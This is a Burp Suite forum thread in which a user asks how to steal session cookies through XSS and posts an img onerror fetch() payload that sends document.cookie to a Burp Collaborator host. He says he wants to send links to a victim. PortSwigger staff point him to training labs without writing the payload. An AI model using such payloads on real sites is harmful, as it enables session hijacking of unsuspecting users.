Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

cookies session collaborator

olek | Last updated: Feb 07, 2022 03:56PM UTC

Hi Team I would like ask about easy question.If I want intercept some cookies session how should looks like line with burp collaborator. ‘“><img src=x onerror=fetch(ra54f7ltuq8q8i7ym90odj9zgqmga5.burpcollaborator.net/?c=(document.cookie)> This is correct.

Michelle, PortSwigger Agent | Last updated: Feb 08, 2022 11:16AM UTC

Thanks for your message. If you're looking to learn about stealing cookies and directing output to the public Collaborator Server I'd suggest taking a look through some of the resources and labs in our Web Security Academy which will allow you to try out some of these techniques, for example: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies https://portswigger.net/web-security/cross-site-scripting/content-security-policy/lab-very-strict-csp-with-dangling-markup-attack I hope this helps.

olek | Last updated: Feb 08, 2022 02:50PM UTC

I just looking for line insert script into (ra54f7ltuq8q8i7ym90odj9zgqmga5.burpcollaborator.net for example I want send links for Victim use Burp how will be looks line.This is payload "><img src=xx onerror=alert(document.cookie)> How to fetch using BURP line.....

Michelle, PortSwigger Agent | Last updated: Feb 09, 2022 09:37AM UTC

The exact details of the script you need to use may vary depending on the application. The XSS labs in the Academy do have a few samples that you can use as a basis to try out different techniques so we would advise checking through some of the resources and lab solutions: https://portswigger.net/web-security/cross-site-scripting This goes slightly beyond the scope of our support service, which is here to address technical issues with the software, but you may find that the wider community on the forum has some further suggestions.

olek | Last updated: Feb 09, 2022 03:59PM UTC

But this is normal question in this tutorial is not show how to insert Burp collaborator and how should looks like Collaborator construction line. for example https://insecure-website.com/status?message=<script>/*+Bad+stuff+here...+*/</script> <p>Status: <script>/* Bad stuff here... */</script></p> How fetch cookies using collaborator ...line .net

Michelle, PortSwigger Agent | Last updated: Feb 09, 2022 04:04PM UTC

Hi If you review the labs we mentioned earlier and click to view the solutions you will find some examples that use burpcollaborator.net, so these might help you.

olek | Last updated: Feb 09, 2022 07:40PM UTC